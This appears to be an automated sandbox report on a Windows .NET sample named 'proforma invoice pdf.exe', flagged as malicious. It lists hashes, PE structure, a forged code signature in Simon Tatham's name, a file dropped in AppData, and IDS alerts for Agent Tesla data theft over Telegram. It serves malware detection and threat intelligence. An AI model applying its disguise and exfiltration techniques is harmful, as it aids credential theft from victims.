Entropy (8bit):	7.128427608315233
Encrypted:	false
SSDEEP:	12288:vTEAWYMV+I4MVKWLFRLvHG0YV0k6LbRbMhG8FjrPqre71+8cYLsm2F9QykR:LhGRgYXYak6LbRR8F3inBYsm2LQB
MD5:	B67477603738159B912B0AA9C197897F
SHA1:	51A14B917E8393A3C1DED172BB04C494FDD727E3
SHA-256:	67CC97B2F5E9D35039589C92C7F6FDA7831AF0F259DDF248FB166664E4027B91
SHA-512:	685FE67B8A5D565CCDAF793A7A25DCD84789AC62E8F747800268A547AF2771CFA7B11E758A7255E5D57117FD8151364D296B52AED4AD4D96C5752CD6B0164CC4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 33%, Browse Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w.\|g..............0..".........."@... ...`....@.. ....................................`..................................?..O....`...............4...6........................................................... ............... ..H............text...( ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............2..............@..B.................@......H.......PB...7......4....y...............................................0............}.....r...p(....}.....r...p(....}.....s....}......}......}.....(.......( .....{.....r7..pr9..p~5...%-.&~4.....R...s....%.5...(...+(...+~6...%-.&~4.....S...s....%.6...(...+...G...%..(...+s.....%.rK..p.%.rY..p...H...(....rs..p ............%...%...(........0..(..........}.....{....o.....s ...... ....(!...&F...}......(........0..............{.....X..}.....s...}......{....o"....o#...t.......(

C:\Users\user\AppData\Roaming\wTyVrj.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\proforma invoice pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.128427608315233
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	proforma invoice pdf.exe
File size:	879'112 bytes
MD5:	b67477603738159b912b0aa9c197897f
SHA1:	51a14b917e8393a3c1ded172bb04c494fdd727e3
SHA256:	67cc97b2f5e9d35039589c92c7f6fda7831af0f259ddf248fb166664e4027b91
SHA512:	685fe67b8a5d565ccdaf793a7a25dcd84789ac62e8f747800268a547af2771cfa7b11e758a7255e5d57117fd8151364d296b52aed4ad4d96c5752cd6b0164cc4
SSDEEP:	12288:vTEAWYMV+I4MVKWLFRLvHG0YV0k6LbRbMhG8FjrPqre71+8cYLsm2F9QykR:LhGRgYXYak6LbRR8F3inBYsm2LQB
TLSH:	28154856934594C5E8C6077D14B3FE7B81266E689A30C18A47ACB9773BB3A8D350F0CB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w.\|g..............0..".........."@... ...`....@.. ....................................`................................

File Icon


Icon Hash:	43511280909a9822

Static PE Info

General

Entrypoint:	0x4b4022
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x677CB377 [Tue Jan 7 04:54:15 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 01:00:00 09/11/2021 00:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb3fd0	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb6000	0x20dfc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xd3400	0x3608	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb2028	0xb2200	2dce0175be07d9fcb5b479e8c13c6b59	False	0.8069161184210526	data	7.491026354805711	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb6000	0x20dfc	0x20e00	1491cd0f3a66af334e54707eb2bbe466	False	0.17009268060836502	data	3.3137582919116	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd8000	0xc	0x200	333f14b471404cc793b702455a8837d7	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xb6148	0x1f8b8	Device independent bitmap graphic, 200 x 312 x 32, image size 124800, resolution 3779 x 3779 px/m	0.14405454770602438
RT_ICON	0xd5a00	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.7136491557223265
RT_GROUP_ICON	0xd6aa8	0x14	data	1.05
RT_GROUP_ICON	0xd6abc	0x22	data	0.9411764705882353
RT_VERSION	0xd6ae0	0x31c	data	0.4321608040201005

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-08T12:30:36.383757+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49711	149.154.167.220	443	TCP
2025-01-08T12:30:36.610034+0100	2851779	ETPRO MALWARE Agent Tesla Telegram Exfil	1	192.168.2.7	49711	149.154.167.220	443	TCP
2025-01-08T12:30:36.610034+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49711	149.154.167.220	443	TCP
2025-01-08T12:30:36.610257+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.7	49711	TCP
2025-01-08T12:30:37.609518+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49713	149.154.167.220	443	TCP
2025-01-08T12:30:38.027822+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49713	149.154.167.220	443	TCP
2025-01-08T12:30:38.028607+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.7	49713	TCP
2025-01-08T12:30:42.257102+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49716	149.154.167.220	443	TCP
2025-01-08T12:30:42.511735+0100	2851779	ETPRO MALWARE Agent Tesla Telegram Exfil	1	192.168.2.7	49716	149.154.167.220	443	TCP
2025-01-08T12:30:42.511735+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49716	149.154.167.220	443	TCP
2025-01-08T12:30:42.511955+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.7	49716	TCP
2025-01-08T12:30:44.345635+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49717	149.154.167.220	443	TCP
2025-01-08T12:30:44.622122+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49717	149.154.167.220	443	TCP
2025-01-08T12:30:44.622400+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.7	49717	TCP
2025-01-08T12:30:50.978219+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49722	149.154.167.220	443	TCP
2025-01-08T12:30:51.227749+0100	2851779	ETPRO MALWARE Agent Tesla Telegram Exfil	1	192.168.2.7	49722	149.154.167.220	443	TCP
2025-01-08T12:30:51.227749+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49722	149.154.167.220	443	TCP
2025-01-08T12:30:51.227971+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.7	49722	TCP
2025-01-08T12:30:52.509657+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49724	149.154.167.220	443	TCP
2025-01-08T12:30:52.881552+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49724	149.154.167.220	443	TCP
2025-01-08T12:30:52.881793+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.7	49724	TCP
2025-01-08T12:30:58.391306+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49726	149.154.167.220	443	TCP
2025-01-08T12:30:58.655456+0100	2851779	ETPRO MALWARE Agent Tesla Telegram Exfil	1	192.168.2.7	49726	149.154.167.220	443	TCP
2025-01-08T12:30:58.655456+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49726	149.154.167.220	443	TCP
2025-01-08T12:30:58.655732+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.7	49726	TCP
2025-01-08T12:31:00.149241+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49727	149.154.167.220	443	TCP
2025-01-08T12:31:00.416556+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49727	149.154.167.220	443	TCP
2025-01-08T12:31:00.416848+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.7	49727	TCP
2025-01-08T12:32:08.365365+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49729	149.154.167.220	443	TCP
2025-01-08T12:32:08.366420+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49729	149.154.167.220	443	TCP
2025-01-08T12:32:17.190035+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49730	149.154.167.220	443	TCP
2025-01-08T12:32:17.195920+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49730	149.154.167.220	443	TCP
2025-01-08T12:32:32.737214+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49731	149.154.167.220	443	TCP
2025-01-08T12:32:32.738002+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49731	149.154.167.220	443	TCP
2025-01-08T12:33:10.817184+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49732	149.154.167.220	443	TCP
2025-01-08T12:33:10.818182+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49732	149.154.167.220	443	TCP
2025-01-08T12:33:12.197242+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49733	149.154.167.220	443	TCP
2025-01-08T12:33:12.197930+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49733	149.154.167.220	443	TCP
2025-01-08T12:33:17.301283+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49734	149.154.167.220	443	TCP
2025-01-08T12:33:17.302380+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49734	149.154.167.220	443	TCP
2025-01-08T12:33:19.923212+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49735	149.154.167.220	443	TCP
2025-01-08T12:33:19.923971+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49735	149.154.167.220	443	TCP
2025-01-08T12:33:22.854116+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49736	149.154.167.220	443	TCP
2025-01-08T12:33:22.858764+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49736	149.154.167.220	443	TCP
2025-01-08T12:33:27.481261+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49737	149.154.167.220	443	TCP
2025-01-08T12:33:27.484985+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49737	149.154.167.220	443	TCP
2025-01-08T12:34:01.546837+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49738	149.154.167.220	443	TCP
2025-01-08T12:34:01.549705+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49738	149.154.167.220	443	TCP
2025-01-08T12:34:09.513094+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49739	149.154.167.220	443	TCP
2025-01-08T12:34:09.516088+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49739	149.154.167.220	443	TCP
2025-01-08T12:34:12.280510+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49740	149.154.167.220	443	TCP
2025-01-08T12:34:12.455710+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49740	149.154.167.220	443	TCP
2025-01-08T12:34:19.402827+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49741	149.154.167.220	443	TCP
2025-01-08T12:34:19.403672+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49741	149.154.167.220	443	TCP
2025-01-08T12:34:32.300227+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49742	149.154.167.220	443	TCP
2025-01-08T12:34:32.310694+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49742	149.154.167.220	443	TCP
2025-01-08T12:34:45.353210+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49743	149.154.167.220	443	TCP
2025-01-08T12:34:45.354072+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49743	149.154.167.220	443	TCP
2025-01-08T12:34:45.382586+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49744	149.154.167.220	443	TCP
2025-01-08T12:34:45.383281+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49744	149.154.167.220	443	TCP
2025-01-08T12:34:45.665977+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49745	149.154.167.220	443	TCP
2025-01-08T12:34:45.668495+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.7	49745	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 12:30:33.705530882 CET	49709	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:33.705591917 CET	443	49709	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:33.705734015 CET	49709	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:33.713619947 CET	49709	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:33.713641882 CET	443	49709	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:34.171395063 CET	443	49709	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:34.171478987 CET	49709	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:34.174460888 CET	49709	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:34.174474001 CET	443	49709	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:34.174734116 CET	443	49709	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:34.220714092 CET	49709	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:34.309429884 CET	49709	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:34.355334997 CET	443	49709	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:34.417690992 CET	443	49709	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:34.417754889 CET	443	49709	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:34.417889118 CET	49709	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:34.424199104 CET	49709	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:35.440293074 CET	49711	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:35.440344095 CET	443	49711	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:35.440571070 CET	49711	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:35.441684961 CET	49711	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:35.441704988 CET	443	49711	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:36.074604988 CET	443	49711	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:36.074733973 CET	49711	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:36.086538076 CET	49711	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:36.086563110 CET	443	49711	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:36.086875916 CET	443	49711	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:36.088404894 CET	49711	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:36.131330967 CET	443	49711	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:36.383929014 CET	443	49711	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:36.384279966 CET	49711	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:36.384296894 CET	443	49711	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:36.610063076 CET	443	49711	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:36.610143900 CET	443	49711	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:36.610245943 CET	49711	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:36.610724926 CET	49711	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:36.687273979 CET	49713	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:36.687338114 CET	443	49713	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:36.687424898 CET	49713	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:36.687705040 CET	49713	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:36.687719107 CET	443	49713	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:37.310075045 CET	443	49713	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:37.315825939 CET	49713	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:37.315859079 CET	443	49713	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:37.609524965 CET	443	49713	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:37.609951973 CET	49713	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:37.609997034 CET	443	49713	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:38.027892113 CET	443	49713	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:38.027990103 CET	443	49713	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:38.028069973 CET	49713	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:38.028637886 CET	49713	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:38.188277960 CET	49715	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:38.188343048 CET	443	49715	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:38.188420057 CET	49715	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:38.194829941 CET	49715	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:38.194849014 CET	443	49715	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:38.668350935 CET	443	49715	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:38.668427944 CET	49715	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:38.670033932 CET	49715	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:38.670042992 CET	443	49715	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:38.670335054 CET	443	49715	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:38.798893929 CET	49715	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:40.069545984 CET	49715	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:40.111335993 CET	443	49715	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:40.179732084 CET	443	49715	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:40.179805040 CET	443	49715	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:40.179866076 CET	49715	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:40.182673931 CET	49715	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:41.325786114 CET	49716	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:41.325831890 CET	443	49716	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:41.325954914 CET	49716	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:41.326320887 CET	49716	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:41.326332092 CET	443	49716	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:41.949843884 CET	443	49716	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:41.949943066 CET	49716	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:41.951598883 CET	49716	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:41.951606989 CET	443	49716	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:41.951874971 CET	443	49716	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:41.953485012 CET	49716	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:41.999330997 CET	443	49716	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:42.257118940 CET	443	49716	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:42.281608105 CET	49716	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:42.281629086 CET	443	49716	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:42.511744976 CET	443	49716	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:42.511859894 CET	443	49716	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:42.513778925 CET	49716	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:42.522830963 CET	49716	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:43.389030933 CET	49717	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:43.389065027 CET	443	49717	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:43.389152050 CET	49717	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:43.389435053 CET	49717	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:43.389453888 CET	443	49717	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:44.019946098 CET	443	49717	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:44.026659012 CET	49717	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:44.026698112 CET	443	49717	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:44.345621109 CET	443	49717	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:44.346769094 CET	49717	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:44.346803904 CET	443	49717	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:44.622189999 CET	443	49717	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:44.622273922 CET	443	49717	149.154.167.220	192.168.2.7
Jan 8, 2025 12:30:44.622647047 CET	49717	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:44.623126030 CET	49717	443	192.168.2.7	149.154.167.220
Jan 8, 2025 12:30:47.619101048 CET	49718	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:47.619144917 CET	443	49718	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:47.619400978 CET	49718	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:47.624777079 CET	49718	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:47.624792099 CET	443	49718	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:48.112323046 CET	443	49718	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:48.112416983 CET	49718	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:48.114816904 CET	49718	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:48.114830971 CET	443	49718	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:48.115087986 CET	443	49718	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:48.158190012 CET	49718	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:48.177886963 CET	49718	443	192.168.2.7	104.26.12.205
Jan 8, 2025 12:30:48.223331928 CET	443	49718	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:48.290709019 CET	443	49718	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:48.290775061 CET	443	49718	104.26.12.205	192.168.2.7
Jan 8, 2025 12:30:48.290884018 CET	49718	443	192.168.2.7	104.26.12.205
